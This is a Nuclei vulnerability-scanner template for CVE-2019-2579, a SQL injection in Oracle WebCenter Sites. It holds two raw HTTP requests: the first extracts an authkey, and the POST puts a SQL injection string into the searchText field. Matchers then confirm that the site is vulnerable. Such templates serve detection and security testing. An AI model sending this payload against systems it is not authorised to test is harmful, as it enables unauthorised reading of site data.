nuclei-templates/http/cves/2019/CVE-2019-2579.yaml

57 lines
1.9 KiB
YAML

id: CVE-2019-2579
info:
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
author: leovalcante
severity: medium
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
- https://nvd.nist.gov/vuln/detail/CVE-2019-2579
- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2019-2579
tags: cve,cve2019,oracle,wcs,sqli
metadata:
max-request: 2
http:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
POST /cs/ContentServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
cookie-reuse: true
extractors:
- type: regex
name: authkey
part: body
internal: true
group: 1
regex:
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
matchers-condition: and
matchers:
- type: word
words:
- "value='' and '1'='0 --"
- "Use this utility to view and manage URLs"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04